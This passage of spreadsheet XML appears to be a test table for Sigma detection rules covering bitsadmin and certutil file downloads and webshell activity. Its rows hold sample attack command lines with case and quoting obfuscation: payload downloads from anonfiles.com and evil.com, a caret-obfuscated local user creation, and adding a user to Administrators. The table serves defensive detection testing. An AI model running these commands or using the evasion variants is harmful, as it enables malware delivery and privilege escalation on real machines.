      <c r="H104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J104" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="43" t="n"/>
      <c r="B105" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C105" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D105" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E105" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCache /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J105" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="n"/>
      <c r="B106" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C106" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D106" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E106" s="36" t="inlineStr">
        <is>
          <t>certutil -URLCaCHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F106" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J106" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="n"/>
      <c r="B107" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C107" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D107" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E107" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split /"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F107" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J107" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="43" t="n"/>
      <c r="B108" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C108" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D108" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E108" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAChE -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F108" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J108" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="n"/>
      <c r="B109" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C109" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D109" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E109" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F109" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H109" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I109" s="43" t="n"/>
      <c r="J109" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="110" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="43" t="n"/>
      <c r="B110" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C110" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D110" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E110" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAcHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J110" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="43" t="n"/>
      <c r="B111" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C111" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D111" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E111" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I111" s="43" t="n"/>
      <c r="J111" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="112" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="43" t="n"/>
      <c r="B112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C112" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D112" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E112" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I112" s="43" t="n"/>
      <c r="J112" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="113" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="43" t="n"/>
      <c r="B113" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C113" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D113" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E113" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLCAChe -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J113" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="43" t="n"/>
      <c r="B114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C114" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D114" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E114" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlcACHe /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J114" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="43" t="n"/>
      <c r="B115" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C115" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D115" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E115" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J115" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="43" t="n"/>
      <c r="B116" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C116" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D116" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E116" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob -"download" -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J116" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="43" t="n"/>
      <c r="B117" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C117" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D117" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E117" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRansFeR myjob /download /PRioRITY normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J117" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="43" t="n"/>
      <c r="B118" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C118" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D118" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E118" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /"download" /PriOrIty normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F118" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J118" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="43" t="n"/>
      <c r="B119" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C119" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D119" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E119" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TraNSFEr myjob /dowNlOad /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F119" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J119" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="43" t="n"/>
      <c r="B120" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C120" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D120" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E120" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I120" s="43" t="n"/>
      <c r="J120" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="43" t="n"/>
      <c r="B121" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C121" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D121" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E121" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tranSFEr myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J121" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="43" t="n"/>
      <c r="B122" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C122" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D122" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E122" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J122" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="43" t="n"/>
      <c r="B123" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C123" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D123" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E123" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J123" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="43" t="n"/>
      <c r="B124" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C124" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D124" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E124" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TrAnsfer myjob /downlOAd /PrioriTy normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H124" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J124" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="43" t="n"/>
      <c r="B125" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C125" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D125" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E125" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J125" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="43" t="n"/>
      <c r="B126" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C126" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D126" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E126" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /PrIORItY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J126" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="43" t="n"/>
      <c r="B127" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C127" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D127" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E127" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /doWnLOaD /pRIoRitY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J127" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="43" t="n"/>
      <c r="B128" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C128" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D128" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E128" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /DoWNlOAd /"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F128" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="36" t="b">
        <v>1</v>
